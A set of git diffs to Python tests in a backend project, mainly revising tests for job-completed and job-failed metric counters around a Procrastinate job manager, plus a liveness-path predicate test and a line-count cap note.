+        calls.append(signal)
+        return None
+
+    monkeypatch.setattr(tenant_context, "is_multi_tenant", lambda: True)
+    monkeypatch.setattr(tenant_context.settings, "tenant_base_domain", "geolens.app")
+    monkeypatch.setattr(tenant_context.settings, "tenant_trusted_hosts", "testserver")
+    monkeypatch.setattr(tenant_context, "_resolve_tenant_uuid", _resolve)
+
+    from app.api.main import app
+
+    transport = ASGITransport(app=app)
+    async with AsyncClient(transport=transport, base_url="http://test") as http:
+        resp = await http.get("/health", headers={"host": "acme.geolens.app"})
+
+    assert calls == ["acme"], "readiness must still resolve the tenant host"
+    assert resp.status_code == 403
+
+
+def test_the_predicate_matches_the_probe_and_nothing_else():
+    from app.api.middleware.liveness import is_liveness_request
+
+    for path in ("/health/live", "/api/health/live"):
+        assert is_liveness_request({"type": "http", "path": path}), path
+    # Behind an ASGI root_path mount.
+    assert is_liveness_request(
+        {"type": "http", "path": "/geolens/health/live", "root_path": "/geolens"}
+    )
+    for path in (
+        "/health",
+        "/api/health",
+        "/health/live/",
+        "/health/liveness",
+        "/datasets/health/live",
+        "",
+    ):
+        assert not is_liveness_request({"type": "http", "path": path}), path
+    # Not an HTTP request at all (websocket, lifespan).
+    assert not is_liveness_request({"type": "websocket", "path": "/health/live"})

--- a/backend/tests/test_jobs_completed_counter_1778.py
+++ b/backend/tests/test_jobs_completed_counter_1778.py
@@ -1,4 +1,4 @@
-"""fix(#1778): both job counters must move, and keep moving after a purge.
+"""fix(#1778): both job counters must move, and only once the row is written.
 
 ``geolens_jobs_completed_total`` was derived from a ``SELECT status, COUNT(*)
 ... GROUP BY status`` over ``catalog.procrastinate_jobs``, but the worker runs
@@ -15,26 +15,34 @@ rows can disappear -- and ``purge_expired_terminal_jobs`` makes them disappear.
 ``_prev_counts`` kept the pre-purge figure, so the next failure produced a
 non-positive delta the counter never saw, taking ``GeoLensJobFailures`` with
 it.
+
+fix(#1778 codex r2): both increments hang off the JOB MANAGER rather than a
+worker middleware. Procrastinate runs worker middleware inside
+``Worker._process_job``'s ``try``, which is before ``_persist_job_status``, so
+a middleware reported a completion for a job whose terminal row had not been
+written and might never be. Wrapping ``job_manager.finish_job`` counts strictly
+after the row lands, and takes Procrastinate's own status instead of
+re-deriving it: a retry goes through ``retry_job`` and never arrives, an abort
+arrives as ``Status.ABORTED`` and is counted as neither.
 """
 
 from __future__ import annotations
 
-import asyncio
 import inspect
 from unittest.mock import AsyncMock, MagicMock, patch
 
 import pytest
-from procrastinate import exceptions as procrastinate_exceptions
+from procrastinate.jobs import Status
 
 from app.observability.metrics.jobs import (
     _refresh_job_metrics,
     jobs_completed_total,
     jobs_failed_total,
 )
+from app.platform.jobs import worker as worker_module
 from app.platform.jobs.worker import (
-    _writes_a_failed_row,
     count_failed_job,
-    count_job_outcome,
+    install_job_outcome_counters,
     purge_expired_terminal_jobs,
 )
 
@@ -51,20 +59,20 @@ def _mock_engine_returning(rows):
     return mock_engine
 
 
-def _context_for(queue: str):
-    context = MagicMock()
-    context.job.queue = queue
-    context.job.task_name = "app.tasks.ingest"
-    return context
+def _job(queue: str):
+    job = MagicMock()
+    job.queue = queue
+    job.id = 4242
+    return job
 
 
-def _worker_with_retry(retry_decision):
-    """A worker whose task declines (None) or grants a retry."""
-    task = MagicMock()
-    task.get_retry_exception = MagicMock(return_value=retry_decision)
-    worker = MagicMock()
-    worker.app.tasks = {"app.tasks.ingest": task}
-    return worker
+def _task_app_with_finish(side_effect=None):
+    """A stand-in app whose job manager records how finish_job was called."""
+    manager = MagicMock()
+    manager.finish_job = AsyncMock(side_effect=side_effect)
+    task_app = MagicMock()
+    task_app.job_manager = manager
+    return task_app, manager
 
 
 def _completed(queue: str) -> float:
@@ -76,147 +84,141 @@ def _failed(queue: str) -> float:
 
 
 # ---------------------------------------------------------------------------
-# Completions
+# Counting at terminal persistence
 # ---------------------------------------------------------------------------
 
 
 @pytest.mark.asyncio
-async def test_a_completed_job_increments_the_counter():
+async def test_a_persisted_success_advances_exactly_one_counter():
     queue = "q1778_ok"
-    before = _completed(queue)
+    completed_before, failed_before = _completed(queue), _failed(queue)
 
-    async def call_next():
-        return "task result"
-
-    result = await count_job_outcome(
-        call_next, _context_for(queue), _worker_with_retry(None)
+    task_app, manager = _task_app_with_finish()
+    inner = manager.finish_job  # the wrapper replaces the attribute
+    install_job_outcome_counters(task_app)
+    await task_app.job_manager.finish_job(
+        job=_job(queue), status=Status.SUCCEEDED, delete_job=True
     )
 
-    assert result == "task result", "middleware must pass the task result through"
+    inner.assert_awaited_once()
+    assert _completed(queue) == completed_before + 1
+    assert _failed(queue) == failed_before
+
+
+@pytest.mark.asyncio
+async def test_a_persisted_failure_advances_exactly_one_counter():
+    queue = "q1778_terminal"
+    completed_before, failed_before = _completed(queue), _failed(queue)
+
+    task_app, _ = _task_app_with_finish()
+    install_job_outcome_counters(task_app)
+    await task_app.job_manager.finish_job(
+        job=_job(queue), status=Status.FAILED, delete_job=False
+    )
+
+    assert _failed(queue) == failed_before + 1
+    assert _completed(queue) == completed_before
+
+
+@pytest.mark.asyncio
+async def test_a_persistence_failure_leaves_both_counters_unchanged():
+    """fix(#1778 codex r2): the ordering a worker middleware could not give.
+
+    A middleware runs before `_persist_job_status`, so it reported a completion
+    for a job whose terminal row was never written.
+    """
+    queue = "q1778_persist_fail"
+    completed_before, failed_before = _completed(queue), _failed(queue)
+
+    task_app, _ = _task_app_with_finish(side_effect=RuntimeError("connection lost"))
+    install_job_outcome_counters(task_app)
+
+    for status in (Status.SUCCEEDED, Status.FAILED):
+        with pytest.raises(RuntimeError):
+            await task_app.job_manager.finish_job(
+                job=_job(queue), status=status, delete_job=False
+            )
+
+    assert _completed(queue) == completed_before
+    assert _failed(queue) == failed_before
+
+
+@pytest.mark.asyncio
+async def test_an_aborted_job_counts_as_neither():
+    """`aborted` is its own status; a graceful shutdown must not page anyone."""
+    queue = "q1778_abort"
+    completed_before, failed_before = _completed(queue), _failed(queue)
+
+    task_app, _ = _task_app_with_finish()
+    install_job_outcome_counters(task_app)
+    await task_app.job_manager.finish_job(
+        job=_job(queue), status=Status.ABORTED, delete_job=False
+    )
+
+    assert _completed(queue) == completed_before
+    assert _failed(queue) == failed_before
+
+
+@pytest.mark.asyncio
+async def test_a_retry_never_reaches_the_counters():
+    """`_persist_job_status` calls retry_job instead of finish_job.
+
+    A retried attempt is therefore not a failure. Counting it would turn one
+    eventual failure into one per attempt, which the row count never did.
+    """
+    queue = "q1778_retry"
+    completed_before, failed_before = _completed(queue), _failed(queue)
+
+    task_app, manager = _task_app_with_finish()
+    manager.retry_job = AsyncMock()
+    install_job_outcome_counters(task_app)
+    await task_app.job_manager.retry_job(job=_job(queue))
+
+    assert _completed(queue) == completed_before
+    assert _failed(queue) == failed_before
+
+
+@pytest.mark.asyncio
+async def test_installing_twice_does_not_double_count():
+    queue = "q1778_idempotent"
+    before = _completed(queue)
+
+    task_app, _ = _task_app_with_finish()
+    install_job_outcome_counters(task_app)
+    install_job_outcome_counters(task_app)
+    await task_app.job_manager.finish_job(
+        job=_job(queue), status=Status.SUCCEEDED, delete_job=True
+    )
+
     assert _completed(queue) == before + 1
 
 
 @pytest.mark.asyncio
-async def test_a_failing_job_does_not_increment_the_completed_counter():
-    queue = "q1778_fail"
-    before = _completed(queue)
+async def test_a_metrics_failure_never_changes_a_job_outcome():
+    task_app, _ = _task_app_with_finish()
+    install_job_outcome_counters(task_app)
 
-    async def call_next():
-        raise RuntimeError("task blew up")
-
-    with pytest.raises(RuntimeError):
-        await count_job_outcome(
-            call_next, _context_for(queue), _worker_with_retry(None)
-        )
-
-    assert _completed(queue) == before
-
-
-@pytest.mark.asyncio
-async def test_a_metrics_failure_never_fails_a_finished_job():
-    async def call_next():
-        return "done"
-
-    context = MagicMock()
-    type(context.job).queue = property(
+    job = MagicMock()
+    type(job).queue = property(
         lambda _self: (_ for _ in ()).throw(RuntimeError("registry down"))
     )
-
-    assert (
-        await count_job_outcome(call_next, context, _worker_with_retry(None)) == "done"
+    # The wrapper must not raise: the terminal row is already written.
+    await task_app.job_manager.finish_job(
+        job=job, status=Status.SUCCEEDED, delete_job=True
     )
 
 
-# ---------------------------------------------------------------------------
-# Failures
-# ---------------------------------------------------------------------------
-
-
-@pytest.mark.asyncio
-async def test_a_terminal_failure_increments_the_failed_counter():
-    queue = "q1778_terminal"
-    before = _failed(queue)
-
-    async def call_next():
-        raise RuntimeError("task blew up")
-
-    with pytest.raises(RuntimeError):
-        await count_job_outcome(
-            call_next, _context_for(queue), _worker_with_retry(None)
-        )
-
-    assert _failed(queue) == before + 1
-
-
-@pytest.mark.asyncio
-async def test_a_retried_attempt_is_not_a_failure():
-    """A retry goes back to `todo` and writes no failed row.
-
-    Counting it would turn one eventual failure into one per attempt, which is
-    not what the row count did.
-    """
-    queue = "q1778_retry"
-    before = _failed(queue)
-
-    async def call_next():
-        raise RuntimeError("transient")
-
-    with pytest.raises(RuntimeError):
-        await count_job_outcome(
-            call_next,
-            _context_for(queue),
-            _worker_with_retry(MagicMock(name="JobRetry")),
-        )
-
-    assert _failed(queue) == before
-
-
-@pytest.mark.asyncio
-async def test_an_aborted_job_is_not_a_failure():
-    """`aborted` is its own status; a graceful shutdown must not page anyone."""
-    queue = "q1778_abort"
-    before = _failed(queue)
-
-    for exc in (
-        procrastinate_exceptions.JobAborted("stop"),
-        asyncio.CancelledError(),
-    ):
-
-        async def call_next(_exc=exc):
-            raise _exc
-
-        with pytest.raises(BaseException):
-            await count_job_outcome(
-                call_next, _context_for(queue), _worker_with_retry(None)
-            )
-
-    assert _failed(queue) == before
-
-
-def test_writes_a_failed_row_mirrors_the_worker_decision():
-    context = _context_for("q1778_decision")
-
-    assert (
-        _writes_a_failed_row(RuntimeError("x"), context, _worker_with_retry(None))
-        is True
+def test_the_worker_installs_the_wrapper_before_it_starts():
+    """Both counters are dead again if main() stops installing it."""
+    src = inspect.getsource(worker_module.main)
+    assert "install_job_outcome_counters(task_app)" in src
+    install_at = src.index("install_job_outcome_counters(task_app)")
+    run_at = src.index("run_worker_async(")
+    assert install_at < run_at, "no job may finish outside the wrapper"
+    assert "worker_middleware=" not in src, (
+        "a worker middleware runs before _persist_job_status and cannot see "
+        "whether the terminal row was written"
     )
-    assert (
-        _writes_a_failed_row(
-            RuntimeError("x"), context, _worker_with_retry(MagicMock())
-        )
-        is False
-    )
-    assert (
-        _writes_a_failed_row(
-            procrastinate_exceptions.JobAborted("x"), context, _worker_with_retry(None)
-        )
-        is False
-    )
-
-    # An unregistered task cannot retry, so procrastinate records `failed`.
-    worker = MagicMock()
-    worker.app.tasks = {}
-    assert _writes_a_failed_row(RuntimeError("x"), context, worker) is True
 
 
 # ---------------------------------------------------------------------------
@@ -246,26 +248,23 @@ async def test_a_failure_after_a_purge_still_advances_the_counter():
     # The purge removes those rows.
     manager = MagicMock()
     manager.delete_old_jobs = AsyncMock(return_value=None)
-    task_app = MagicMock()
-    task_app.job_manager = manager
-    with patch("app.processing.ingest.tasks.task_app", task_app):
+    purge_app = MagicMock()
+    purge_app.job_manager = manager
+    with patch("app.processing.ingest.tasks.task_app", purge_app):
         with patch("app.core.config.settings.ingest_jobs_retention_days", 30):
             await purge_expired_terminal_jobs()
     manager.delete_old_jobs.assert_awaited_once()
 
-    # A poll that now sees no failed rows, then one new failure.
+    # A poll that now sees no failed rows, then one new persisted failure.
     with patch("app.core.db.engine", _mock_engine_returning([])):
         await _refresh_job_metrics()
 
     before = _failed(queue)
-
-    async def call_next():
-        raise RuntimeError("post-purge failure")
-
-    with pytest.raises(RuntimeError):
-        await count_job_outcome(
-            call_next, _context_for(queue), _worker_with_retry(None)
-        )
+    task_app, _ = _task_app_with_finish()
+    install_job_outcome_counters(task_app)
+    await task_app.job_manager.finish_job(
+        job=_job(queue), status=Status.FAILED, delete_job=False
+    )
 
     assert _failed(queue) == before + 1
 
@@ -304,14 +303,15 @@ async def test_a_succeeded_row_is_not_a_source_for_the_counter():
 # ---------------------------------------------------------------------------
 
 
-def test_the_stalled_sweep_counts_its_own_failures():
-    """fix(#1778 codex r1): a transition count has to be told about this one."""
-    from app.platform.jobs import worker as worker_module
-
+def test_the_stalled_sweep_counts_its_own_failures_after_persisting():
+    """It calls finish_job_by_id_async directly, so the wrapper never sees it."""
     src = inspect.getsource(worker_module.fail_stalled_queue_jobs)
     assert "count_failed_job(job.queue)" in src, (
         "failing a stalled job is a terminal transition the counter must see"
     )
+    persist_at = src.index("finish_job_by_id_async(")
+    count_at = src.index("count_failed_job(job.queue)")
+    assert persist_at < count_at, "a persistence failure must count nothing"
 
     queue = "q1778_sweep"
     before = _failed(queue)
@@ -322,11 +322,3 @@ def test_the_stalled_sweep_counts_its_own_failures():
     default_before = _failed("default")
     count_failed_job(None)
     assert _failed("default") == default_before + 1
-
-
-def test_the_worker_registers_the_middleware():
-    """Both counters are dead again if run_worker_async stops carrying it."""
-    from app.platform.jobs import worker as worker_module
-
-    src = inspect.getsource(worker_module.main)
-    assert "worker_middleware=[count_job_outcome]" in src

--- a/backend/tests/test_jobs_completed_counter_1778.py
+++ b/backend/tests/test_jobs_completed_counter_1778.py
@@ -306,12 +306,19 @@ async def test_a_succeeded_row_is_not_a_source_for_the_counter():
 def test_the_stalled_sweep_counts_its_own_failures_after_persisting():
     """It calls finish_job_by_id_async directly, so the wrapper never sees it."""
     src = inspect.getsource(worker_module.fail_stalled_queue_jobs)
-    assert "count_failed_job(job.queue)" in src, (
+    assert "count_failed_job(" in src, (
         "failing a stalled job is a terminal transition the counter must see"
     )
     persist_at = src.index("finish_job_by_id_async(")
-    count_at = src.index("count_failed_job(job.queue)")
+    count_at = src.index("count_failed_job(")
     assert persist_at < count_at, "a persistence failure must count nothing"
+    # fix(#1778 codex r5): the queue is read defensively. count_failed_job
+    # guards the registry call, but the attribute read happens at the call site
+    # and outside that guard, so `job.queue` on a job object without the
+    # attribute raised mid-loop and aborted the rest of the sweep.
+    assert 'getattr(job, "queue", None)' in src, (
+        "a metrics read must never be the thing that stops the sweep"
+    )
 
     queue = "q1778_sweep"
     before = _failed(queue)

--- a/backend/tests/test_jobs_completed_counter_1778.py
+++ b/backend/tests/test_jobs_completed_counter_1778.py
@@ -1,28 +1,42 @@
-"""fix(#1778): geolens_jobs_completed_total must actually move.
+"""fix(#1778): both job counters must move, and keep moving after a purge.
 
-The counter was derived from a ``SELECT status, COUNT(*) ... GROUP BY status``
-over ``catalog.procrastinate_jobs``, but the worker runs with
-``delete_jobs="successful"``, which makes ``procrastinate_finish_job_v1``
+``geolens_jobs_completed_total`` was derived from a ``SELECT status, COUNT(*)
+... GROUP BY status`` over ``catalog.procrastinate_jobs``, but the worker runs
+with ``delete_jobs="successful"``, which makes ``procrastinate_finish_job_v1``
 DELETE the row while it is still ``doing``. No ``succeeded`` row is ever
-written, so the 15s poll could never observe one, and the metric has read a
-flat zero since it was added -- along with the RUNBOOK entry that documents it
-and the "Job throughput" Grafana panel whose first target is
-``rate(geolens_jobs_completed_total[15m])``. A healthy ingest burst looked
-exactly like a crashed worker.
+written, so the 15s poll could never observe one, and the metric read a flat
+zero -- along with the RUNBOOK entry that documents it and the "Job throughput"
+Grafana panel whose first target is ``rate(geolens_jobs_completed_total[15m])``.
+A healthy ingest burst looked exactly like a crashed worker.
+
+fix(#1778 codex r1): ``geolens_jobs_failed_total`` moves here too. It used to
+be a delta against a snapshot of a row count, which stops working the moment
+rows can disappear -- and ``purge_expired_terminal_jobs`` makes them disappear.
+``_prev_counts`` kept the pre-purge figure, so the next failure produced a
+non-positive delta the counter never saw, taking ``GeoLensJobFailures`` with
+it.
 """
 
 from __future__ import annotations
 
+import asyncio
+import inspect
 from unittest.mock import AsyncMock, MagicMock, patch
 
 import pytest
+from procrastinate import exceptions as procrastinate_exceptions
 
 from app.observability.metrics.jobs import (
     _refresh_job_metrics,
     jobs_completed_total,
     jobs_failed_total,
 )
-from app.platform.jobs.worker import count_completed_job
+from app.platform.jobs.worker import (
+    _writes_a_failed_row,
+    count_failed_job,
+    count_job_outcome,
+    purge_expired_terminal_jobs,
+)
 
 
 def _mock_engine_returning(rows):
@@ -40,36 +54,62 @@ def _mock_engine_returning(rows):
 def _context_for(queue: str):
     context = MagicMock()
     context.job.queue = queue
+    context.job.task_name = "app.tasks.ingest"
     return context
+
+
+def _worker_with_retry(retry_decision):
+    """A worker whose task declines (None) or grants a retry."""
+    task = MagicMock()
+    task.get_retry_exception = MagicMock(return_value=retry_decision)
+    worker = MagicMock()
+    worker.app.tasks = {"app.tasks.ingest": task}
+    return worker
+
+
+def _completed(queue: str) -> float:
+    return jobs_completed_total.labels(queue=queue)._value.get()
+
+
+def _failed(queue: str) -> float:
+    return jobs_failed_total.labels(queue=queue)._value.get()
+
+
+# ---------------------------------------------------------------------------
+# Completions
+# ---------------------------------------------------------------------------
 
 
 @pytest.mark.asyncio
 async def test_a_completed_job_increments_the_counter():
     queue = "q1778_ok"
-    before = jobs_completed_total.labels(queue=queue)._value.get()
+    before = _completed(queue)
 
     async def call_next():
         return "task result"
 
-    result = await count_completed_job(call_next, _context_for(queue), MagicMock())
+    result = await count_job_outcome(
+        call_next, _context_for(queue), _worker_with_retry(None)
+    )
 
     assert result == "task result", "middleware must pass the task result through"
-    assert jobs_completed_total.labels(queue=queue)._value.get() == before + 1
+    assert _completed(queue) == before + 1
 
 
 @pytest.mark.asyncio
-async def test_a_failing_job_does_not_increment_the_counter():
-    """Any exception is a non-success for procrastinate, retries included."""
+async def test_a_failing_job_does_not_increment_the_completed_counter():
     queue = "q1778_fail"
-    before = jobs_completed_total.labels(queue=queue)._value.get()
+    before = _completed(queue)
 
     async def call_next():
         raise RuntimeError("task blew up")
 
     with pytest.raises(RuntimeError):
-        await count_completed_job(call_next, _context_for(queue), MagicMock())
+        await count_job_outcome(
+            call_next, _context_for(queue), _worker_with_retry(None)
+        )
 
-    assert jobs_completed_total.labels(queue=queue)._value.get() == before
+    assert _completed(queue) == before
 
 
 @pytest.mark.asyncio
@@ -82,51 +122,211 @@ async def test_a_metrics_failure_never_fails_a_finished_job():
         lambda _self: (_ for _ in ()).throw(RuntimeError("registry down"))
     )
 
-    assert await count_completed_job(call_next, context, MagicMock()) == "done"
+    assert (
+        await count_job_outcome(call_next, context, _worker_with_retry(None)) == "done"
+    )
+
+
+# ---------------------------------------------------------------------------
+# Failures
+# ---------------------------------------------------------------------------
 
 
 @pytest.mark.asyncio
-async def test_the_poll_no_longer_pretends_to_count_completions():
-    """The row scan must not claim completions it cannot see.
+async def test_a_terminal_failure_increments_the_failed_counter():
+    queue = "q1778_terminal"
+    before = _failed(queue)
 
-    Feeding it a realistic row set for this deployment's delete_jobs setting:
-    todo and doing rows exist, failed rows persist, succeeded rows never do.
+    async def call_next():
+        raise RuntimeError("task blew up")
+
+    with pytest.raises(RuntimeError):
+        await count_job_outcome(
+            call_next, _context_for(queue), _worker_with_retry(None)
+        )
+
+    assert _failed(queue) == before + 1
+
+
+@pytest.mark.asyncio
+async def test_a_retried_attempt_is_not_a_failure():
+    """A retry goes back to `todo` and writes no failed row.
+
+    Counting it would turn one eventual failure into one per attempt, which is
+    not what the row count did.
     """
+    queue = "q1778_retry"
+    before = _failed(queue)
+
+    async def call_next():
+        raise RuntimeError("transient")
+
+    with pytest.raises(RuntimeError):
+        await count_job_outcome(
+            call_next,
+            _context_for(queue),
+            _worker_with_retry(MagicMock(name="JobRetry")),
+        )
+
+    assert _failed(queue) == before
+
+
+@pytest.mark.asyncio
+async def test_an_aborted_job_is_not_a_failure():
+    """`aborted` is its own status; a graceful shutdown must not page anyone."""
+    queue = "q1778_abort"
+    before = _failed(queue)
+
+    for exc in (
+        procrastinate_exceptions.JobAborted("stop"),
+        asyncio.CancelledError(),
+    ):
+
+        async def call_next(_exc=exc):
+            raise _exc
+
+        with pytest.raises(BaseException):
+            await count_job_outcome(
+                call_next, _context_for(queue), _worker_with_retry(None)
+            )
+
+    assert _failed(queue) == before
+
+
+def test_writes_a_failed_row_mirrors_the_worker_decision():
+    context = _context_for("q1778_decision")
+
+    assert (
+        _writes_a_failed_row(RuntimeError("x"), context, _worker_with_retry(None))
+        is True
+    )
+    assert (
+        _writes_a_failed_row(
+            RuntimeError("x"), context, _worker_with_retry(MagicMock())
+        )
+        is False
+    )
+    assert (
+        _writes_a_failed_row(
+            procrastinate_exceptions.JobAborted("x"), context, _worker_with_retry(None)
+        )
+        is False
+    )
+
+    # An unregistered task cannot retry, so procrastinate records `failed`.
+    worker = MagicMock()
+    worker.app.tasks = {}
+    assert _writes_a_failed_row(RuntimeError("x"), context, worker) is True
+
+
+# ---------------------------------------------------------------------------
+# The regression the purge introduced
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.asyncio
+async def test_a_failure_after_a_purge_still_advances_the_counter():
+    """fix(#1778 codex r1): purge, then a failure, the counter advances by one.
+
+    With the old snapshot delta this was the bug: the poll recorded the queue's
+    failed row count, the purge deleted those rows, and the next burst came in
+    below the remembered figure, so `delta > 0` was false and the counter never
+    moved again.
+    """
+    queue = "q1778_after_purge"
+
+    # A poll while failed rows exist. It must not touch the counter at all.
+    before_poll = _failed(queue)
+    with patch("app.core.db.engine", _mock_engine_returning([("failed", queue, 7)])):
+        await _refresh_job_metrics()
+    assert _failed(queue) == before_poll, (
+        "the poll must not derive the failed counter from a row count"
+    )
+
+    # The purge removes those rows.
+    manager = MagicMock()
+    manager.delete_old_jobs = AsyncMock(return_value=None)
+    task_app = MagicMock()
+    task_app.job_manager = manager
+    with patch("app.processing.ingest.tasks.task_app", task_app):
+        with patch("app.core.config.settings.ingest_jobs_retention_days", 30):
+            await purge_expired_terminal_jobs()
+    manager.delete_old_jobs.assert_awaited_once()
+
+    # A poll that now sees no failed rows, then one new failure.
+    with patch("app.core.db.engine", _mock_engine_returning([])):
+        await _refresh_job_metrics()
+
+    before = _failed(queue)
+
+    async def call_next():
+        raise RuntimeError("post-purge failure")
+
+    with pytest.raises(RuntimeError):
+        await count_job_outcome(
+            call_next, _context_for(queue), _worker_with_retry(None)
+        )
+
+    assert _failed(queue) == before + 1
+
+
+@pytest.mark.asyncio
+async def test_the_poll_no_longer_derives_either_counter_from_rows():
+    """Feeding it a realistic row set for this deployment's delete_jobs setting."""
     queue = "q1778_poll"
-    completed_before = jobs_completed_total.labels(queue=queue)._value.get()
-    failed_before = jobs_failed_total.labels(queue=queue)._value.get()
+    completed_before = _completed(queue)
+    failed_before = _failed(queue)
 
     rows = [("todo", queue, 3), ("doing", queue, 1), ("failed", queue, 2)]
     with patch("app.core.db.engine", _mock_engine_returning(rows)):
         await _refresh_job_metrics()
 
-    assert jobs_completed_total.labels(queue=queue)._value.get() == completed_before
-    # The sibling branch still works, which is what GeoLensJobFailures needs.
-    assert jobs_failed_total.labels(queue=queue)._value.get() == failed_before + 2
+    assert _completed(queue) == completed_before
+    assert _failed(queue) == failed_before
 
 
 @pytest.mark.asyncio
 async def test_a_succeeded_row_is_not_a_source_for_the_counter():
-    """The counterfactual for the old design, kept as a guard.
-
-    If someone reinstates the row-scan branch beside the middleware, a
-    deployment that ever did persist succeeded rows would double count.
-    """
+    """The counterfactual for the old design, kept as a guard."""
     queue = "q1778_succeeded"
-    before = jobs_completed_total.labels(queue=queue)._value.get()
+    before = _completed(queue)
 
-    rows = [("succeeded", queue, 99)]
-    with patch("app.core.db.engine", _mock_engine_returning(rows)):
+    with patch(
+        "app.core.db.engine", _mock_engine_returning([("succeeded", queue, 99)])
+    ):
         await _refresh_job_metrics()
 
-    assert jobs_completed_total.labels(queue=queue)._value.get() == before
+    assert _completed(queue) == before
+
+
+# ---------------------------------------------------------------------------
+# The other site that writes a failed row
+# ---------------------------------------------------------------------------
+
+
+def test_the_stalled_sweep_counts_its_own_failures():
+    """fix(#1778 codex r1): a transition count has to be told about this one."""
+    from app.platform.jobs import worker as worker_module
+
+    src = inspect.getsource(worker_module.fail_stalled_queue_jobs)
+    assert "count_failed_job(job.queue)" in src, (
+        "failing a stalled job is a terminal transition the counter must see"
+    )
+
+    queue = "q1778_sweep"
+    before = _failed(queue)
+    count_failed_job(queue)
+    assert _failed(queue) == before + 1
+
+    # A queue-less job still lands somewhere countable.
+    default_before = _failed("default")
+    count_failed_job(None)
+    assert _failed("default") == default_before + 1
 
 
 def test_the_worker_registers_the_middleware():
-    """The counter is dead again if run_worker_async stops carrying it."""
-    import inspect
-
+    """Both counters are dead again if run_worker_async stops carrying it."""
     from app.platform.jobs import worker as worker_module
 
     src = inspect.getsource(worker_module.main)
-    assert "worker_middleware=[count_completed_job]" in src
+    assert "worker_middleware=[count_job_outcome]" in src

--- a/backend/tests/test_jobs_completed_counter_1778.py
+++ b/backend/tests/test_jobs_completed_counter_1778.py
@@ -1,0 +1,132 @@
+"""fix(#1778): geolens_jobs_completed_total must actually move.
+
+The counter was derived from a ``SELECT status, COUNT(*) ... GROUP BY status``
+over ``catalog.procrastinate_jobs``, but the worker runs with
+``delete_jobs="successful"``, which makes ``procrastinate_finish_job_v1``
+DELETE the row while it is still ``doing``. No ``succeeded`` row is ever
+written, so the 15s poll could never observe one, and the metric has read a
+flat zero since it was added -- along with the RUNBOOK entry that documents it
+and the "Job throughput" Grafana panel whose first target is
+``rate(geolens_jobs_completed_total[15m])``. A healthy ingest burst looked
+exactly like a crashed worker.
+"""
+
+from __future__ import annotations
+
+from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+
+from app.observability.metrics.jobs import (
+    _refresh_job_metrics,
+    jobs_completed_total,
+    jobs_failed_total,
+)
+from app.platform.jobs.worker import count_completed_job
+
+
+def _mock_engine_returning(rows):
+    result = MagicMock()
+    result.fetchall.return_value = rows
+    mock_conn = MagicMock()
+    mock_conn.execute = AsyncMock(return_value=result)
+    mock_conn.__aenter__ = AsyncMock(return_value=mock_conn)
+    mock_conn.__aexit__ = AsyncMock(return_value=False)
+    mock_engine = MagicMock()
+    mock_engine.connect = MagicMock(return_value=mock_conn)
+    return mock_engine
+
+
+def _context_for(queue: str):
+    context = MagicMock()
+    context.job.queue = queue
+    return context
+
+
+@pytest.mark.asyncio
+async def test_a_completed_job_increments_the_counter():
+    queue = "q1778_ok"
+    before = jobs_completed_total.labels(queue=queue)._value.get()
+
+    async def call_next():
+        return "task result"
+
+    result = await count_completed_job(call_next, _context_for(queue), MagicMock())
+
+    assert result == "task result", "middleware must pass the task result through"
+    assert jobs_completed_total.labels(queue=queue)._value.get() == before + 1
+
+
+@pytest.mark.asyncio
+async def test_a_failing_job_does_not_increment_the_counter():
+    """Any exception is a non-success for procrastinate, retries included."""
+    queue = "q1778_fail"
+    before = jobs_completed_total.labels(queue=queue)._value.get()
+
+    async def call_next():
+        raise RuntimeError("task blew up")
+
+    with pytest.raises(RuntimeError):
+        await count_completed_job(call_next, _context_for(queue), MagicMock())
+
+    assert jobs_completed_total.labels(queue=queue)._value.get() == before
+
+
+@pytest.mark.asyncio
+async def test_a_metrics_failure_never_fails_a_finished_job():
+    async def call_next():
+        return "done"
+
+    context = MagicMock()
+    type(context.job).queue = property(
+        lambda _self: (_ for _ in ()).throw(RuntimeError("registry down"))
+    )
+
+    assert await count_completed_job(call_next, context, MagicMock()) == "done"
+
+
+@pytest.mark.asyncio
+async def test_the_poll_no_longer_pretends_to_count_completions():
+    """The row scan must not claim completions it cannot see.
+
+    Feeding it a realistic row set for this deployment's delete_jobs setting:
+    todo and doing rows exist, failed rows persist, succeeded rows never do.
+    """
+    queue = "q1778_poll"
+    completed_before = jobs_completed_total.labels(queue=queue)._value.get()
+    failed_before = jobs_failed_total.labels(queue=queue)._value.get()
+
+    rows = [("todo", queue, 3), ("doing", queue, 1), ("failed", queue, 2)]
+    with patch("app.core.db.engine", _mock_engine_returning(rows)):
+        await _refresh_job_metrics()
+
+    assert jobs_completed_total.labels(queue=queue)._value.get() == completed_before
+    # The sibling branch still works, which is what GeoLensJobFailures needs.
+    assert jobs_failed_total.labels(queue=queue)._value.get() == failed_before + 2
+
+
+@pytest.mark.asyncio
+async def test_a_succeeded_row_is_not_a_source_for_the_counter():
+    """The counterfactual for the old design, kept as a guard.
+
+    If someone reinstates the row-scan branch beside the middleware, a
+    deployment that ever did persist succeeded rows would double count.
+    """
+    queue = "q1778_succeeded"
+    before = jobs_completed_total.labels(queue=queue)._value.get()
+
+    rows = [("succeeded", queue, 99)]
+    with patch("app.core.db.engine", _mock_engine_returning(rows)):
+        await _refresh_job_metrics()
+
+    assert jobs_completed_total.labels(queue=queue)._value.get() == before
+
+
+def test_the_worker_registers_the_middleware():
+    """The counter is dead again if run_worker_async stops carrying it."""
+    import inspect
+
+    from app.platform.jobs import worker as worker_module
+
+    src = inspect.getsource(worker_module.main)
+    assert "worker_middleware=[count_completed_job]" in src

--- a/backend/tests/test_layering.py
+++ b/backend/tests/test_layering.py
@@ -4625,7 +4625,14 @@ _MODULE_LOC_CAPS: dict[str, int] = {
     # fix(#1778): +3 lines — download_cog documents the
     # 412 its If-Match branch raises, closing a gap the repaired
     # OpenAPI-contract gate surfaced. Cap 1548 -> 1551, exact.
-    "backend/app/modules/catalog/datasets/api/router_export.py": 1551,
+    # fix(#1778): 1551 -> 1602. +51 for `_cog_presign_seconds` and the note
+    # above it. The s3 branch signed the redirect for a flat 3600 seconds,
+    # which exchanged the 120-second, dataset-scoped, revocable download token
+    # SEC-04 mints for an hour-long bearer URL the bucket will honour after the
+    # grant is revoked. Most of the addition is why the ceiling and the floor
+    # are the values they are: the deadline is evaluated when the bucket
+    # receives the request, not over the transfer.
+    "backend/app/modules/catalog/datasets/api/router_export.py": 1602,
     # fix(#1532 review r29): first entry — crossed _RATCHET_INCLUSION_LOC. The
     # export artifact cache: everything is in the key (stamp, size, digest,
